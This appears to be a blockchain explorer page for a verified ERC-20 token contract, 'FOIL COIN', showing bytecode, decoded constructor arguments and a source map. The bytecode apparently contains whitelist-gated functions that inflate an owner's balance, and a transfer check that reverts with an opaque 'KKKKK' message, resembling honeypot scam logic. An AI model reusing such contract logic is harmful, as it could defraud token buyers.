a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea264697066735822122065af20299027e12538603df13742f158ff41ec091e7524e62dd0d4752044d29764736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000003b9aca000000000000000000000000000000000000000000000000000000000000000009464f494c20434f494e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004464f494c00000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): FOIL COIN
Arg [1] : symbol_ (string): FOIL
Arg [2] : tokenAmount_ (uint40): 1000000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [4] : 464f494c20434f494e0000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 464f494c00000000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

13539:25895:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19632:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22913:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21171:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23656:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13966:81;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20517:76;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26390:90;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24375:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21841:111;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11491:103;;;:::i;:::-;;10843:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19851:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25116:422;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26486:57;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21952:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26169:96;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22200:135;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26271:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11749:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;19632:100;19686:13;19719:5;19712:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19632:100;:::o;22913:165::-;22996:4;23003:13;23019:12;:10;:12::i;:::-;23003:28;;23032:32;23041:5;23048:7;23057:6;23032:8;:32::i;:::-;23072:4;23065:11;;;22913:165;;;;:::o;21171:92::-;21232:7;21249:12;;21242:19;;21171:92;:::o;23656:295::-;23787:4;23804:15;23822:12;:10;:12::i;:::-;23804:30;;23845:38;23861:4;23867:7;23876:6;23845:15;:38::i;:::-;23894:27;23904:4;23910:2;23914:6;23894:9;:27::i;:::-;23939:4;23932:11;;;23656:295;;;;;:::o;13966:81::-;;;:::o;20517:76::-;20575:5;20590:1;20583:8;;20517:76;:::o;26390:90::-;26443:7;26461:12;:17;26474:3;26461:17;;;;;;;;;;;;;;;;26454:24;;26390:90;;;:::o;24375:238::-;24463:4;24480:13;24496:12;:10;:12::i;:::-;24480:28;;24519:64;24528:5;24535:7;24572:10;24544:25;24554:5;24561:7;24544:9;:25::i;:::-;:38;;;;:::i;:::-;24519:8;:64::i;:::-;24601:4;24594:11;;;24375:238;;;;:::o;21841:111::-;21915:7;21932:9;:18;21942:7;21932:18;;;;;;;;;;;;;;;;21925:25;;21841:111;;;:::o;11491:103::-;10729:13;:11;:13::i;:::-;11556:30:::1;11583:1;11556:18;:30::i;:::-;11491:103::o:0;10843:87::-;10889:7;10916:6;;;;;;;;;;;10909:13;;10843:87;:::o;19851:88::-;19907:13;19930:7;19923:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;19851:88;:::o;25116:422::-;25209:4;25226:13;25242:12;:10;:12::i;:::-;25226:28;;25265:24;25292:25;25302:5;25309:7;25292:9;:25::i;:::-;25265:52;;25356:15;25336:16;:35;;25328:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;25441:60;25450:5;25457:7;25485:15;25466:16;:34;25441:8;:60::i;:::-;25526:4;25519:11;;;;25116:422;;;;:::o;26486:57::-;26531:10;26537:3;26531:5;:10::i;:::-;26486:57;:::o;21952:157::-;22031:4;22038:13;22054:12;:10;:12::i;:::-;22038:28;;22067;22077:5;22084:2;22088:6;22067:9;:28::i;:::-;22103:4;22096:11;;;21952:157;;;;:::o;26169:96::-;26225:12;:10;:12::i;:::-;26222:42;;;26260:1;26240:12;:17;26253:3;26240:17;;;;;;;;;;;;;;;:21;;;;26222:42;26169:96;:::o;22200:135::-;22289:7;22306:11;:18;22318:5;22306:18;;;;;;;;;;;;;;;:27;22325:7;22306:27;;;;;;;;;;;;;;;;22299:34;;22200:135;;;;:::o;26271:113::-;26327:12;:10;:12::i;:::-;26324:59;;;26375:5;26362:12;;:18;;;;:::i;:::-;26342:12;:17;26355:3;26342:17;;;;;;;;;;;;;;;:38;;;;26324:59;26271:113;:::o;11749:201::-;10729:13;:11;:13::i;:::-;11858:1:::1;11838:22;;:8;:22;;::::0;11830:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;11914:28;11933:8;11914:18;:28::i;:::-;11749:201:::0;:::o;8392:106::-;8445:7;8480:10;8473:17;;8392:106;:::o;38038:378::-;38191:1;38174:19;;:5;:19;;;38166:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;38272:1;38253:21;;:7;:21;;;38245:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;38354:6;38324:11;:18;38336:5;38324:18;;;;;;;;;;;;;;;:27;38343:7;38324:27;;;;;;;;;;;;;;;:36;;;;38392:7;38376:32;;38385:5;38376:32;;;38401:6;38376:32;;;;;;:::i;:::-;;;;;;;;38038:378;;;:::o;38707:441::-;38842:24;38869:25;38879:5;38886:7;38869:9;:25::i;:::-;38842:52;;38929:17;38909:16;:37;38905:236;;38991:6;38971:16;:26;;38963:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;39067:51;39076:5;39083:7;39111:6;39092:16;:25;39067:8;:51::i;:::-;38905:236;38831:317;38707:441;;;:::o;28561:7569::-;30847:17;30867:28;30893:1;30867:12;:18;30880:4;30867:18;;;;;;;;;;;;;;;;:25;;:28;;;;:::i;:::-;30847:48;;30927:7;30914:9;:20;;30906:38;;;;;;;;;;;;:::i;:::-;;;;;;;;;35282:1;35266:18;;:4;:18;;;35258:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;35359:1;35345:16;;:2;:16;;;35337:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;35412:19;35434:9;:15;35444:4;35434:15;;;;;;;;;;;;;;;;35412:37;;35483:7;35468:11;:22;;35460:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;35544:15;35562:27;35585:3;35562:18;35574:5;;35562:7;:11;;:18;;;;:::i;:::-;:22;;:27;;;;:::i;:::-;35544:45;;35600:11;35614:23;35629:7;35614;:14;;:23;;;;:::i;:::-;35600:37;;35705:7;35691:11;:21;35673:9;:15;35683:4;35673:15;;;;;;;;;;;;;;;:39;;;;35909:3;35892:9;:13;35902:2;35892:13;;;;;;;;;;;;;;;;:20;;;;;;;;;;;35953:7;35927:9;:22;35937:11;35927:22;;;;;;;;;;;;;;;;:33;;;;;;;;;;;36004:2;35989:27;;35998:4;35989:27;;;36008:7;35989:27;;;;;;:::i;:::-;;;;;;;;36042:1;36032:7;:11;36029:93;;;36089:11;36074:36;;36083:4;36074:36;;;36102:7;36074:36;;;;;;:::i;:::-;;;;;;;;36029:93;28674:7456;;;;28561:7569;;;:::o;11008:132::-;11083:12;:10;:12::i;:::-;11072:23;;:7;:5;:7::i;:::-;:23;;;11064:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11008:132::o;12110:191::-;12184:16;12203:6;;;;;;;;;;;12184:25;;12229:8;12220:6;;:17;;;;;;;;;;;;;;;;;;12284:8;12253:40;;12274:8;12253:40;;;;;;;;;;;;12173:128;12110:191;:::o;25544:101::-;25584:12;:10;:12::i;:::-;25581:63;;;25638:3;25625:12;;:16;;;;:::i;:::-;25599:9;:23;25609:12;:10;:12::i;:::-;25599:23;;;;;;;;;;;;;;;:42;;;;25581:63;25544:101;:::o;18187:143::-;18231:4;18237:10;18277:12;:10;:12::i;:::-;18260:30;;;;;;;;:::i;:::-;;;;;;;;;;;;;18250:41;;;;;;18237:54;;18295:2;:6;18298:2;18295:6;;;;;;;;;;;;;;;;;;;;;18292:24;;;18310:4;18303:11;;;;;18292:24;18323:5;18316:12;;;18187:143;;:::o;1580:101::-;1641:7;1672:1;1668;:5;;;;:::i;:::-;1661:12;;1580:101;;;;:::o;1691:98::-;1749:7;1780:1;1776;:5;;;;:::i;:::-;1769:12;;1691:98;;;;:::o;2090:::-;2148:7;2179:1;2175;:5;;;;:::i;:::-;2168:12;;2090:98;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:118::-;4510:24;4528:5;4510:24;:::i;:::-;4505:3;4498:37;4423:118;;:::o;4547:222::-;4640:4;4678:2;4667:9;4663:18;4655:26;;4691:71;4759:1;4748:9;4744:17;4735:6;4691:71;:::i;:::-;4547:222;;;;:::o;4775:86::-;4810:7;4850:4;4843:5;4839:16;4828:27;;4775:86;;;:::o;4867:112::-;4950:22;4966:5;4950:22;:::i;:::-;4945:3;4938:35;4867:112;;:::o;4985:214::-;5074:4;5112:2;5101:9;5097:18;5089:26;;5125:67;5189:1;5178:9;5174:17;5165:6;5125:67;:::i;:::-;4985:214;;;;:::o;5205:329::-;5264:6;5313:2;5301:9;5292:7;5288:23;5284:32;5281:119;;;5319:79;;:::i;:::-;5281:119;5439:1;5464:53;5509:7;5500:6;5489:9;5485:22;5464:53;:::i;:::-;5454:63;;5410:117;5205:329;;;;:::o;5540:::-;5599:6;5648:2;5636:9;5627:7;5623:23;5619:32;5616:119;;;5654:79;;:::i;:::-;5616:119;5774:1;5799:53;5844:7;5835:6;5824:9;5820:22;5799:53;:::i;:::-;5789:63;;5745:117;5540:329;;;;:::o;5875:474::-;5943:6;5951;6000:2;5988:9;5979:7;5975:23;5971:32;5968:119;;;6006:79;;:::i;:::-;5968:119;6126:1;6151:53;6196:7;6187:6;6176:9;6172:22;6151:53;:::i;:::-;6141:63;;6097:117;6253:2;6279:53;6324:7;6315:6;6304:9;6300:22;6279:53;:::i;:::-;6269:63;;6224:118;5875:474;;;;;:::o;6355:180::-;6403:77;6400:1;6393:88;6500:4;6497:1;6490:15;6524:4;6521:1;6514:15;6541:320;6585:6;6622:1;6616:4;6612:12;6602:22;;6669:1;6663:4;6659:12;6690:18;6680:81;;6746:4;6738:6;6734:17;6724:27;;6680:81;6808:2;6800:6;6797:14;6777:18;6774:38;6771:84;;6827:18;;:::i;:::-;6771:84;6592:269;6541:320;;;:::o;6867:180::-;6915:77;6912:1;6905:88;7012:4;7009:1;7002:15;7036:4;7033:1;7026:15;7053:191;7093:3;7112:20;7130:1;7112:20;:::i;:::-;7107:25;;7146:20;7164:1;7146:20;:::i;:::-;7141:25;;7189:1;7186;7182:9;7175:16;;7210:3;7207:1;7204:10;7201:36;;;7217:18;;:::i;:::-;7201:36;7053:191;;;;:::o;7250:224::-;7390:34;7386:1;7378:6;7374:14;7367:58;7459:7;7454:2;7446:6;7442:15;7435:32;7250:224;:::o;7480:366::-;7622:3;7643:67;7707:2;7702:3;7643:67;:::i;:::-;7636:74;;7719:93;7808:3;7719:93;:::i;:::-;7837:2;7832:3;7828:12;7821:19;;7480:366;;;:::o;7852:419::-;8018:4;8056:2;8045:9;8041:18;8033:26;;8105:9;8099:4;8095:20;8091:1;8080:9;8076:17;8069:47;8133:131;8259:4;8133:131;:::i;:::-;8125:139;;7852:419;;;:::o;8277:410::-;8317:7;8340:20;8358:1;8340:20;:::i;:::-;8335:25;;8374:20;8392:1;8374:20;:::i;:::-;8369:25;;8429:1;8426;8422:9;8451:30;8469:11;8451:30;:::i;:::-;8440:41;;8630:1;8621:7;8617:15;8614:1;8611:22;8591:1;8584:9;8564:83;8541:139;;8660:18;;:::i;:::-;8541:139;8325:362;8277:410;;;;:::o;8693:225::-;8833:34;8829:1;8821:6;8817:14;8810:58;8902:8;8897:2;8889:6;8885:15;8878:33;8693:225;:::o;8924:366::-;9066:3;9087:67;9151:2;9146:3;9087:67;:::i;:::-;9080:74;;9163:93;9252:3;9163:93;:::i;:::-;9281:2;9276:3;9272:12;9265:19;;8924:366;;;:::o;9296:419::-;9462:4;9500:2;9489:9;9485:18;9477:26;;9549:9;9543:4;9539:20;9535:1;9524:9;9520:17;9513:47;9577:131;9703:4;9577:131;:::i;:::-;9569:139;;9296:419;;;:::o;9721:223::-;9861:34;9857:1;9849:6;9845:14;9838:58;9930:6;9925:2;9917:6;9913:15;9906:31;9721:223;:::o;9950:366::-;10092:3;10113:67;10177:2;10172:3;10113:67;:::i;:::-;10106:74;;10189:93;10278:3;10189:93;:::i;:::-;10307:2;10302:3;10298:12;10291:19;;9950:366;;;:::o;10322:419::-;10488:4;10526:2;10515:9;10511:18;10503:26;;10575:9;10569:4;10565:20;10561:1;10550:9;10546:17;10539:47;10603:131;10729:4;10603:131;:::i;:::-;10595:139;;10322:419;;;:::o;10747:221::-;10887:34;10883:1;10875:6;10871:14;10864:58;10956:4;10951:2;10943:6;10939:15;10932:29;10747:221;:::o;10974:366::-;11116:3;11137:67;11201:2;11196:3;11137:67;:::i;:::-;11130:74;;11213:93;11302:3;11213:93;:::i;:::-;11331:2;11326:3;11322:12;11315:19;;10974:366;;;:::o;11346:419::-;11512:4;11550:2;11539:9;11535:18;11527:26;;11599:9;11593:4;11589:20;11585:1;11574:9;11570:17;11563:47;11627:131;11753:4;11627:131;:::i;:::-;11619:139;;11346:419;;;:::o;11771:179::-;11911:31;11907:1;11899:6;11895:14;11888:55;11771:179;:::o;11956:366::-;12098:3;12119:67;12183:2;12178:3;12119:67;:::i;:::-;12112:74;;12195:93;12284:3;12195:93;:::i;:::-;12313:2;12308:3;12304:12;12297:19;;11956:366;;;:::o;12328:419::-;12494:4;12532:2;12521:9;12517:18;12509:26;;12581:9;12575:4;12571:20;12567:1;12556:9;12552:17;12545:47;12609:131;12735:4;12609:131;:::i;:::-;12601:139;;12328:419;;;:::o;12753:155::-;12893:7;12889:1;12881:6;12877:14;12870:31;12753:155;:::o;12914:365::-;13056:3;13077:66;13141:1;13136:3;13077:66;:::i;:::-;13070:73;;13152:93;13241:3;13152:93;:::i;:::-;13270:2;13265:3;13261:12;13254:19;;12914:365;;;:::o;13285:419::-;13451:4;13489:2;13478:9;13474:18;13466:26;;13538:9;13532:4;13528:20;13524:1;13513:9;13509:17;13502:47;13566:131;13692:4;13566:131;:::i;:::-;13558:139;;13285:419;;;:::o;13710:224::-;13850:34;13846:1;13838:6;13834:14;13827:58;13919:7;13914:2;13906:6;13902:15;13895:32;13710:224;:::o;13940:366::-;14082:3;14103:67;14167:2;14162:3;14103:67;:::i;:::-;14096:74;;14179:93;14268:3;14179:93;:::i;:::-;14297:2;14292:3;14288:12;14281:19;;13940:366;;;:::o;14312:419::-;14478:4;14516:2;14505:9;14501:18;14493:26;;14565:9;14559:4;14555:20;14551:1;14540:9;14536:17;14529:47;14593:131;14719:4;14593:131;:::i;:::-;14585:139;;14312:419;;;:::o;14737:222::-;14877:34;14873:1;14865:6;14861:14;14854:58;14946:5;14941:2;14933:6;14929:15;14922:30;14737:222;:::o;14965:366::-;15107:3;15128:67;15192:2;15187:3;15128:67;:::i;:::-;15121:74;;15204:93;15293:3;15204:93;:::i;:::-;15322:2;15317:3;15313:12;15306:19;;14965:366;;;:::o;15337:419::-;15503:4;15541:2;15530:9;15526:18;15518:26;;15590:9;15584:4;15580:20;15576:1;15565:9;15561:17;15554:47;15618:131;15744:4;15618:131;:::i;:::-;15610:139;;15337:419;;;:::o;15762:225::-;15902:34;15898:1;15890:6;15886:14;15879:58;15971:8;15966:2;15958:6;15954:15;15947:33;15762:225;:::o;15993:366::-;16135:3;16156:67;16220:2;16215:3;16156:67;:::i;:::-;16149:74;;16232:93;16321:3;16232:93;:::i;:::-;16350:2;16345:3;16341:12;16334:19;;15993:366;;;:::o;16365:419::-;16531:4;16569:2;16558:9;16554:18;16546:26;;16618:9;16612:4;16608:20;16604:1;16593:9;16589:17;16582:47;16646:131;16772:4;16646:131;:::i;:::-;16638:139;;16365:419;;;:::o;16790:182::-;16930:34;16926:1;16918:6;16914:14;16907:58;16790:182;:::o;16978:366::-;17120:3;17141:67;17205:2;17200:3;17141:67;:::i;:::-;17134:74;;17217:93;17306:3;17217:93;:::i;:::-;17335:2;17330:3;17326:12;17319:19;;16978:366;;;:::o;17350:419::-;17516:4;17554:2;17543:9;17539:18;17531:26;;17603:9;17597:4;17593:20;17589:1;17578:9;17574:17;17567:47;17631:131;17757:4;17631:131;:::i;:::-;17623:139;;17350:419;;;:::o;17775:94::-;17808:8;17856:5;17852:2;17848:14;17827:35;;17775:94;;;:::o;17875:::-;17914:7;17943:20;17957:5;17943:20;:::i;:::-;17932:31;;17875:94;;;:::o;17975:100::-;18014:7;18043:26;18063:5;18043:26;:::i;:::-;18032:37;;17975:100;;;:::o;18081:157::-;18186:45;18206:24;18224:5;18206:24;:::i;:::-;18186:45;:::i;:::-;18181:3;18174:58;18081:157;;:::o;18244:256::-;18356:3;18371:75;18442:3;18433:6;18371:75;:::i;:::-;18471:2;18466:3;18462:12;18455:19;;18491:3;18484:10;;18244:256;;;;:::o;18506:194::-;18546:4;18566:20;18584:1;18566:20;:::i;:::-;18561:25;;18600:20;18618:1;18600:20;:::i;:::-;18595:25;;18644:1;18641;18637:9;18629:17;;18668:1;18662:4;18659:11;18656:37;;;18673:18;;:::i;:::-;18656:37;18506: